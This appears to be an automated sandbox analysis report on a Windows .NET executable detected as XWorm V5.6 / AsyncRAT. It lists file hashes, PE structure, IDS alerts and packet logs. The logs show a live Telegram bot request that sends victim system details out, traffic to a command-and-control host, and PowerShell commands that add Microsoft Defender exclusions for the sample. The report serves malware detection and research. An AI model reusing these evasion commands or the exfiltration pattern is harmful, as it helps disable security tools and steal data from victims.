                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....i.f.............................+... ...@....@.. ....................................@.................................4+..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p+......H.......`]..........&.....................................................(....*.r...p*. .G%.*..(....*.r{..p*. ...*.s.........s.........s.........s.........*.r...p*. ..g.*.r3..p*. ....*.r...p*. ~.H.*.r...p*. ....*.rG..p*. [.x.*..((...*.r...p*. .t..*.r\..p*. ....*.(,...-.(-...,.+.(....,.+.(+...,.+.(*...,..(]...*&(....&+.*.+5sj... .... .'..ok...(*...~....-.(_...(Q...~....ol...&.-.*.r...p*. ...*.r&..p*. .O..*.r...p*. ....*.r...p*. ....*.r:..p*. IWp.*.r...p*. .(T.*.r...p*. q...

                                                                        Static File Info

                                                                        General

                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Entropy (8bit):5.928240316671683
                                                                        TrID:
                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                        • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                        • Windows Screen Saver (13104/52) 0.07%
                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                        File name:VJV2AjJ7Na.exe
                                                                        File size:71'168 bytes
                                                                        MD5:99088d7d8b409b4039b02295e64a686f
                                                                        SHA1:f58dad3090854f8ab5cc3de89d6cdaeb151883d4
                                                                        SHA256:a9f1d82a7954d86d746086969c0d7b7b5ca65ccfd0d6a375931a6826eca1a8c7
                                                                        SHA512:a485b749f096a63bcc733b848317ceca918ee46516bcf17593c8358303a80aa0fb15c99b444fbeac02f79ac69c165e8a2fbb614265a56d99b5c098bd48d388b7
                                                                        SSDEEP:1536:/Jyq1zgbszio2koAZnsuW8sLFbsnkRs6v6daV4IO8geup:/JT1zPziqoQsX8sLFbsH6R4IO8geup
                                                                        TLSH:AF636A187BE94025F1FF9FB55DE17266CA79B3236803D61F54C9028B1A23A85CC817F6
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....i.f.............................+... ...@....@.. ....................................@................................

                                                                        File Icon

                                                                        Icon Hash:00928e8e8686b000

                                                                        Static PE Info

                                                                        General

                                                                        Entrypoint:0x412b8e
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x66A36988 [Fri Jul 26 09:16:56 2024 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                        Entrypoint Preview

                                                                        Instruction
                                                                        jmp dword ptr [00402000h]
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al

                                                                        Data Directories

                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x12b340x57.text
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x140000x4ce.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x160000xc.reloc
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                        Sections

                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                        .text0x20000x10b940x10c000d48cdd565a4710712d69e162bf0226aFalse0.6010815065298507data6.003794116366673IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                        .rsrc0x140000x4ce0x600f9052177c59fad11b6e11866b69a673fFalse0.375data3.726864092899557IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .reloc0x160000xc0x200bcf16d11098960ba96cc952f19bc273cFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                        Resources

                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                        RT_VERSION0x140a00x244data0.4724137931034483
                                                                        RT_MANIFEST0x142e40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                                                        Imports

                                                                        DLLImport
                                                                        mscoree.dll_CorExeMain

                                                                        Network Behavior

                                                                        Suricata IDS Alerts

                                                                        TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                                                        2024-07-26T21:23:22.379211+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3097049720147.185.221.21192.168.2.6
                                                                        2024-07-26T21:22:55.160186+0200TCP2012510ET SHELLCODE UTF-8/16 Encoded Shellcode44349719149.154.167.220192.168.2.6
                                                                        2024-07-26T21:22:55.159601+0200TCP2853685ETPRO MALWARE Win32/XWorm Checkin via Telegram49719443192.168.2.6149.154.167.220
                                                                        2024-07-26T21:22:51.830728+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434971813.85.23.86192.168.2.6
                                                                        2024-07-26T21:23:16.474992+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3097049720147.185.221.21192.168.2.6
                                                                        2024-07-26T21:24:00.825159+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3097049720147.185.221.21192.168.2.6
                                                                        2024-07-26T21:24:01.270266+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4972030970192.168.2.6147.185.221.21
                                                                        2024-07-26T21:22:14.312906+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434971320.114.59.183192.168.2.6
                                                                        2024-07-26T21:23:09.044405+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3097049720147.185.221.21192.168.2.6
                                                                        2024-07-26T21:24:01.268441+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3097049720147.185.221.21192.168.2.6
                                                                        2024-07-26T21:23:09.092721+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4972030970192.168.2.6147.185.221.21
                                                                        2024-07-26T21:23:22.381102+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4972030970192.168.2.6147.185.221.21
                                                                        2024-07-26T21:23:35.706366+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4972030970192.168.2.6147.185.221.21
                                                                        2024-07-26T21:23:49.131894+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3097049720147.185.221.21192.168.2.6
                                                                        2024-07-26T21:24:06.033582+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3097049720147.185.221.21192.168.2.6
                                                                        2024-07-26T21:23:59.832923+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3097049720147.185.221.21192.168.2.6
                                                                        2024-07-26T21:23:59.835128+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4972030970192.168.2.6147.185.221.21
                                                                        2024-07-26T21:23:46.482216+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3097049720147.185.221.21192.168.2.6
                                                                        2024-07-26T21:24:00.826655+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4972030970192.168.2.6147.185.221.21
                                                                        2024-07-26T21:23:35.704548+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3097049720147.185.221.21192.168.2.6
                                                                        2024-07-26T21:24:06.034293+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4972030970192.168.2.6147.185.221.21
                                                                        2024-07-26T21:23:49.134083+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4972030970192.168.2.6147.185.221.21

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Jul 26, 2024 21:21:59.865530014 CEST4971080192.168.2.6208.95.112.1
                                                                        Jul 26, 2024 21:21:59.870626926 CEST8049710208.95.112.1192.168.2.6
                                                                        Jul 26, 2024 21:21:59.870764971 CEST4971080192.168.2.6208.95.112.1
                                                                        Jul 26, 2024 21:21:59.871692896 CEST4971080192.168.2.6208.95.112.1
                                                                        Jul 26, 2024 21:21:59.876696110 CEST8049710208.95.112.1192.168.2.6
                                                                        Jul 26, 2024 21:22:00.370646954 CEST8049710208.95.112.1192.168.2.6
                                                                        Jul 26, 2024 21:22:00.414874077 CEST4971080192.168.2.6208.95.112.1
                                                                        Jul 26, 2024 21:22:42.725936890 CEST8049710208.95.112.1192.168.2.6
                                                                        Jul 26, 2024 21:22:42.725997925 CEST4971080192.168.2.6208.95.112.1
                                                                        Jul 26, 2024 21:22:54.101310015 CEST49719443192.168.2.6149.154.167.220
                                                                        Jul 26, 2024 21:22:54.101350069 CEST44349719149.154.167.220192.168.2.6
                                                                        Jul 26, 2024 21:22:54.101411104 CEST49719443192.168.2.6149.154.167.220
                                                                        Jul 26, 2024 21:22:54.110394955 CEST49719443192.168.2.6149.154.167.220
                                                                        Jul 26, 2024 21:22:54.110410929 CEST44349719149.154.167.220192.168.2.6
                                                                        Jul 26, 2024 21:22:54.783282995 CEST44349719149.154.167.220192.168.2.6
                                                                        Jul 26, 2024 21:22:54.783452034 CEST49719443192.168.2.6149.154.167.220
                                                                        Jul 26, 2024 21:22:54.785316944 CEST49719443192.168.2.6149.154.167.220
                                                                        Jul 26, 2024 21:22:54.785324097 CEST44349719149.154.167.220192.168.2.6
                                                                        Jul 26, 2024 21:22:54.785729885 CEST44349719149.154.167.220192.168.2.6
                                                                        Jul 26, 2024 21:22:54.834089041 CEST49719443192.168.2.6149.154.167.220
                                                                        Jul 26, 2024 21:22:54.876518011 CEST44349719149.154.167.220192.168.2.6
                                                                        Jul 26, 2024 21:22:55.159708023 CEST44349719149.154.167.220192.168.2.6
                                                                        Jul 26, 2024 21:22:55.159885883 CEST44349719149.154.167.220192.168.2.6
                                                                        Jul 26, 2024 21:22:55.159938097 CEST49719443192.168.2.6149.154.167.220
                                                                        Jul 26, 2024 21:22:55.165585995 CEST49719443192.168.2.6149.154.167.220
                                                                        Jul 26, 2024 21:22:55.335484028 CEST4972030970192.168.2.6147.185.221.21
                                                                        Jul 26, 2024 21:22:55.340415955 CEST3097049720147.185.221.21192.168.2.6
                                                                        Jul 26, 2024 21:22:55.340501070 CEST4972030970192.168.2.6147.185.221.21
                                                                        Jul 26, 2024 21:22:55.372082949 CEST4972030970192.168.2.6147.185.221.21
                                                                        Jul 26, 2024 21:22:55.377124071 CEST3097049720147.185.221.21192.168.2.6
                                                                        Jul 26, 2024 21:23:08.731106043 CEST4972030970192.168.2.6147.185.221.21
                                                                        Jul 26, 2024 21:23:08.736464024 CEST3097049720147.185.221.21192.168.2.6
                                                                        Jul 26, 2024 21:23:09.044404984 CEST3097049720147.185.221.21192.168.2.6
                                                                        Jul 26, 2024 21:23:09.086838007 CEST4972030970192.168.2.6147.185.221.21
                                                                        Jul 26, 2024 21:23:09.092720985 CEST4972030970192.168.2.6147.185.221.21
                                                                        Jul 26, 2024 21:23:09.097940922 CEST3097049720147.185.221.21192.168.2.6
                                                                        Jul 26, 2024 21:23:16.474992037 CEST3097049720147.185.221.21192.168.2.6
                                                                        Jul 26, 2024 21:23:16.524334908 CEST4972030970192.168.2.6147.185.221.21
                                                                        Jul 26, 2024 21:23:22.087580919 CEST4972030970192.168.2.6147.185.221.21
                                                                        Jul 26, 2024 21:23:22.117000103 CEST3097049720147.185.221.21192.168.2.6
                                                                        Jul 26, 2024 21:23:22.379210949 CEST3097049720147.185.221.21192.168.2.6
                                                                        Jul 26, 2024 21:23:22.381102085 CEST4972030970192.168.2.6147.185.221.21
                                                                        Jul 26, 2024 21:23:22.387219906 CEST3097049720147.185.221.21192.168.2.6
                                                                        Jul 26, 2024 21:23:35.446749926 CEST4972030970192.168.2.6147.185.221.21
                                                                        Jul 26, 2024 21:23:35.452013969 CEST3097049720147.185.221.21192.168.2.6
                                                                        Jul 26, 2024 21:23:35.704547882 CEST3097049720147.185.221.21192.168.2.6
                                                                        Jul 26, 2024 21:23:35.706366062 CEST4972030970192.168.2.6147.185.221.21
                                                                        Jul 26, 2024 21:23:35.711623907 CEST3097049720147.185.221.21192.168.2.6
                                                                        Jul 26, 2024 21:23:40.399703026 CEST4971080192.168.2.6208.95.112.1
                                                                        Jul 26, 2024 21:23:40.411526918 CEST8049710208.95.112.1192.168.2.6
                                                                        Jul 26, 2024 21:23:46.482215881 CEST3097049720147.185.221.21192.168.2.6
                                                                        Jul 26, 2024 21:23:46.524437904 CEST4972030970192.168.2.6147.185.221.21
                                                                        Jul 26, 2024 21:23:48.806231022 CEST4972030970192.168.2.6147.185.221.21
                                                                        Jul 26, 2024 21:23:48.811220884 CEST3097049720147.185.221.21192.168.2.6
                                                                        Jul 26, 2024 21:23:49.131894112 CEST3097049720147.185.221.21192.168.2.6
                                                                        Jul 26, 2024 21:23:49.134083033 CEST4972030970192.168.2.6147.185.221.21
                                                                        Jul 26, 2024 21:23:49.138964891 CEST3097049720147.185.221.21192.168.2.6
                                                                        Jul 26, 2024 21:23:59.587315083 CEST4972030970192.168.2.6147.185.221.21
                                                                        Jul 26, 2024 21:23:59.592514992 CEST3097049720147.185.221.21192.168.2.6
                                                                        Jul 26, 2024 21:23:59.832922935 CEST3097049720147.185.221.21192.168.2.6
                                                                        Jul 26, 2024 21:23:59.835128069 CEST4972030970192.168.2.6147.185.221.21
                                                                        Jul 26, 2024 21:23:59.840133905 CEST3097049720147.185.221.21192.168.2.6
                                                                        Jul 26, 2024 21:24:00.571533918 CEST4972030970192.168.2.6147.185.221.21
                                                                        Jul 26, 2024 21:24:00.576783895 CEST3097049720147.185.221.21192.168.2.6
                                                                        Jul 26, 2024 21:24:00.825159073 CEST3097049720147.185.221.21192.168.2.6
                                                                        Jul 26, 2024 21:24:00.826654911 CEST4972030970192.168.2.6147.185.221.21
                                                                        Jul 26, 2024 21:24:00.831582069 CEST3097049720147.185.221.21192.168.2.6
                                                                        Jul 26, 2024 21:24:00.946685076 CEST4972030970192.168.2.6147.185.221.21
                                                                        Jul 26, 2024 21:24:00.951575994 CEST3097049720147.185.221.21192.168.2.6
                                                                        Jul 26, 2024 21:24:01.268440962 CEST3097049720147.185.221.21192.168.2.6
                                                                        Jul 26, 2024 21:24:01.270266056 CEST4972030970192.168.2.6147.185.221.21
                                                                        Jul 26, 2024 21:24:01.275235891 CEST3097049720147.185.221.21192.168.2.6
                                                                        Jul 26, 2024 21:24:05.790350914 CEST4972030970192.168.2.6147.185.221.21
                                                                        Jul 26, 2024 21:24:05.796945095 CEST3097049720147.185.221.21192.168.2.6
                                                                        Jul 26, 2024 21:24:06.033581972 CEST3097049720147.185.221.21192.168.2.6
                                                                        Jul 26, 2024 21:24:06.034292936 CEST4972030970192.168.2.6147.185.221.21
                                                                        Jul 26, 2024 21:24:06.039051056 CEST3097049720147.185.221.21192.168.2.6

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Jul 26, 2024 21:21:59.851650000 CEST6428453192.168.2.61.1.1.1
                                                                        Jul 26, 2024 21:21:59.860373020 CEST53642841.1.1.1192.168.2.6
                                                                        Jul 26, 2024 21:22:54.090760946 CEST5452953192.168.2.61.1.1.1
                                                                        Jul 26, 2024 21:22:54.100698948 CEST53545291.1.1.1192.168.2.6
                                                                        Jul 26, 2024 21:22:55.279386997 CEST6516353192.168.2.61.1.1.1
                                                                        Jul 26, 2024 21:22:55.328250885 CEST53651631.1.1.1192.168.2.6

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                        Jul 26, 2024 21:21:59.851650000 CEST192.168.2.61.1.1.10xb86dStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                        Jul 26, 2024 21:22:54.090760946 CEST192.168.2.61.1.1.10xc97bStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                        Jul 26, 2024 21:22:55.279386997 CEST192.168.2.61.1.1.10xa167Standard query (0)main-although.gl.at.ply.ggA (IP address)IN (0x0001)false

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                        Jul 26, 2024 21:21:59.860373020 CEST1.1.1.1192.168.2.60xb86dNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                        Jul 26, 2024 21:22:54.100698948 CEST1.1.1.1192.168.2.60xc97bNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                        Jul 26, 2024 21:22:55.328250885 CEST1.1.1.1192.168.2.60xa167No error (0)main-although.gl.at.ply.gg147.185.221.21A (IP address)IN (0x0001)false

                                                                        HTTP Request Dependency Graph

                                                                        • api.telegram.org
                                                                        • ip-api.com

                                                                        HTTP Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.649710208.95.112.1806496C:\Users\user\Desktop\VJV2AjJ7Na.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Jul 26, 2024 21:21:59.871692896 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                                                        Host: ip-api.com
                                                                        Connection: Keep-Alive
                                                                        Jul 26, 2024 21:22:00.370646954 CEST175INHTTP/1.1 200 OK
                                                                        Date: Fri, 26 Jul 2024 19:22:00 GMT
                                                                        Content-Type: text/plain; charset=utf-8
                                                                        Content-Length: 6
                                                                        Access-Control-Allow-Origin: *
                                                                        X-Ttl: 60
                                                                        X-Rl: 44
                                                                        Data Raw: 66 61 6c 73 65 0a
                                                                        Data Ascii: false


                                                                        HTTPS Proxied Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.649719149.154.167.2204436496C:\Users\user\Desktop\VJV2AjJ7Na.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-07-26 19:22:54 UTC448OUTGET /bot7208700451:AAHHz5xWybJ91pH6F9vJRw8dcMEBlRiBXKs/sendMessage?chat_id=6131620354&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A55D979A7C4323CB5C4DA%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20D3K68%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1
                                                                        Host: api.telegram.org
                                                                        Connection: Keep-Alive
                                                                        2024-07-26 19:22:55 UTC388INHTTP/1.1 200 OK
                                                                        Server: nginx/1.18.0
                                                                        Date: Fri, 26 Jul 2024 19:22:55 GMT
                                                                        Content-Type: application/json
                                                                        Content-Length: 505
                                                                        Connection: close
                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                        Access-Control-Allow-Origin: *
                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                        2024-07-26 19:22:55 UTC505INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 30 38 37 30 30 34 35 31 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 67 6f 76 6e 6f 31 32 33 5f 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 64 6a 77 64 6a 77 61 77 61 6a 68 64 77 6a 61 6b 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 31 33 31 36 32 30 33 35 34 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 23 5c 75 30 34 34 37 5c 75 30 34 34 33 5c 75 30 34 34 38 5c 75 30 34 33 61 5c 75 30 34 33 30 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 62 62 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 42 41 54
                                                                        Data Ascii: {"ok":true,"result":{"message_id":66,"from":{"id":7208700451,"is_bot":true,"first_name":"govno123_bot","username":"djwdjwawajhdwjak_bot"},"chat":{"id":6131620354,"first_name":"#\u0447\u0443\u0448\u043a\u0430\ud83d\udc68\u200d\ud83d\udcbb","username":"CBAT


                                                                        Statistics

                                                                        CPU Usage

                                                                        Click to jump to process

                                                                        Memory Usage

                                                                        Click to jump to process

                                                                        High Level Behavior Distribution

                                                                        Click to dive into process behavior distribution

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        General

                                                                        Target ID:0
                                                                        Start time:15:21:55
                                                                        Start date:26/07/2024
                                                                        Path:C:\Users\user\Desktop\VJV2AjJ7Na.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Users\user\Desktop\VJV2AjJ7Na.exe"
                                                                        Imagebase:0x7f0000
                                                                        File size:71'168 bytes
                                                                        MD5 hash:99088D7D8B409B4039B02295E64A686F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.2103665413.00000000007F2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.2103665413.00000000007F2000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.3360702564.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.3360702564.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:low
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:2
                                                                        Start time:15:22:00
                                                                        Start date:26/07/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VJV2AjJ7Na.exe'
                                                                        Imagebase:0x7ff6e3d50000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:3
                                                                        Start time:15:22:00
                                                                        Start date:26/07/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff66e660000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:5
                                                                        Start time:15:22:06
                                                                        Start date:26/07/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'VJV2AjJ7Na.exe'
                                                                        Imagebase:0x7ff6e3d50000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:6
                                                                        Start time:15:22:06
                                                                        Start date:26/07/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff66e660000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
